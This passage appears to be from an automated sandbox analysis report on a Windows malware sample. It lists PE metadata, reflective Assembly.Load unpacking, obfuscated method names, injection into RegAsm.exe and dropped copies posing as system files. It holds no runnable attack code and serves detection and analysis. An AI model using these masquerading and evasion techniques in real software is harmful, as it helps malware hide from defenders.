Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll			Jump to behavior

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
Source:	Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.1.dr
Source:	Binary string: indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: RegAsm.exe, 00000001.00000002.522683399.00000000051B0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
Source:	Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.1.dr
Source:	Binary string: indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000001.00000002.517172717.0000000002705000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: RegAsm.exe, 00000001.00000002.522683399.00000000051B0000.00000002.00000001.sdmp

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A3C304 LoadLibraryA,GetProcAddress,		0_2_00A3C304
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A3C304 LoadLibraryA,GetProcAddress,		0_2_00A3C304

Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: real checksum: 0xeeb70 should be: 0x11a301
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: real checksum: 0xeeb70 should be: 0x1196a5
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: real checksum: 0xeeb70 should be: 0x11a301
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: real checksum: 0xeeb70 should be: 0x1196a5

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E8B85 push ecx; ret	0_2_009E8B98
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E8B85 push ecx; ret	0_2_009E8B98
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_00E081F0 push eax; iretd	1_2_00E081F1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_00E062D1 push ebx; retf	1_2_00E062D2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_00E062D4 push ebx; retf	1_2_00E062D6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_00E09D78 pushad ; retf	1_2_00E09D79
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04D7902D push ebx; ret	1_2_04D7902E
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009A8B85 push ecx; ret	12_2_009A8B98

Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', 